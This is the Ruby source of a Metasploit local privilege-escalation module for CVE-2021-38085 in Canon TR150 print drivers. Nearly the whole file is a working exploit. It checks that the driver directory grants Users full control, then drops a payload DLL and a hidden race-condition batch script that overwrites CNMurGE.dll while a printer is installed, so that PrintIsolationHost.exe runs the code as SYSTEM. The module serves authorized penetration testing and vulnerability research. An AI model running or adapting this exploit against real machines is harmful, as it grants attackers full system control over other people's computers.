##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Canon Driver Privilege Escalation',
'Description' => %q{
Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files
within the "CanonBJ" directory and its subdirectories. By overwriting the DLL at
C:\ProgramData\CanonBJ\IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules\040C\CNMurGE.dll
with a malicious DLL at the right time whilst running the C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs
script to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program,
which runs as NT AUTHORITY\SYSTEM, to successfully load the malicious DLL. Successful exploitation
will grant attackers code execution as the NT AUTHORITY\SYSTEM user.
This module leverages the prnmngr.vbs script
to add and delete printers. Multiple runs of this
module may be required given successful exploitation
is time-sensitive.
},
'License' => MSF_LICENSE,
'Author' => [
'Jacob Baines', # discovery, PoC, module
'Shelby Pace' # original Ricoh module
],
'References' =>
[
['CVE', '2021-38085'],
],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[
'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
]
],
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ],
'Reliability' => [ UNRELIABLE_SESSION ],
'Stability' => [ SERVICE_RESOURCE_LOSS ]
},
'DisclosureDate' => '2021-08-07',
'DefaultTarget' => 0
)
)
self.needs_cleanup = true
end
def check
@driver_path = ''
dir_name = 'C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series'
return CheckCode::Safe('No Canon TR150 driver directory found') unless directory?(dir_name)
language_dirs = dir(dir_name)
return CheckCode::Detected("Detected Canon driver directory, but no language files. Its likely the driver is installed but a printer hasn't been added yet") unless language_dirs.length
@driver_path = dir_name
@driver_path.concat('\\LanguageModules\\040C')
res = cmd_exec("icacls \"#{@driver_path}\"")
vulnerable = res.match(/\\Users:(?:\(I\))?\(OI\)\(CI\)\(F\)/)
return CheckCode::Safe("#{@driver_path} directory does not exist or does not grant Users full permissions") unless vulnerable
vprint_status("Vulnerable language driver directory: #{@driver_path}")
CheckCode::Appears('Canon language driver directory grants Users full permissions')
end
def add_printer(driver_name)
fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)
dll_data = generate_payload_dll
dll_path = "#{@driver_path}\\CNMurGE.dll"
temp_path = expand_path('%TEMP%\\CNMurGE.dll')
bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
# this script monitors the target dll for modification and then copies
# over our malicious dll. As this is a time based attack, it won't
# always be succuessful!
bat_file = <<~HEREDOC
attrib -a "#{dll_path}"
:repeat
for %%i in ("#{dll_path}") do echo %%~ai | find "a" >nul || goto :repeat
timeout /t 1
#{cp_cmd}
attrib -a "#{dll_path}"
HEREDOC
print_status("Dropping batch script to #{bat_file_path}")
write_file(bat_file_path, bat_file)
print_status("Writing DLL file to #{temp_path}")
write_file(temp_path, dll_data)
register_files_for_cleanup(bat_file_path, temp_path)
script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
vprint_status('Executing the batch script...')
client.sys.process.execute(bat_cmd, nil, { 'Hidden' => true })
print_status("Adding printer #{@printer_name}...")
cmd_exec(script_cmd)
rescue Rex::Post::Meterpreter::RequestError => e
fail_with(Failure::Unknown, "#{e.class} #{e.message}")
end
def exploit
fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'
if sysinfo['Architecture'] != payload.arch.first
fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target machine')
end
@printer_name = Rex::Text.rand_text_alpha(5..9)
@script_path = 'C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs'
drvr_name = 'Canon TR150 series'
add_printer(drvr_name)
end
def cleanup
print_status("Deleting printer #{@printer_name}")
sleep(3)
delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
end
end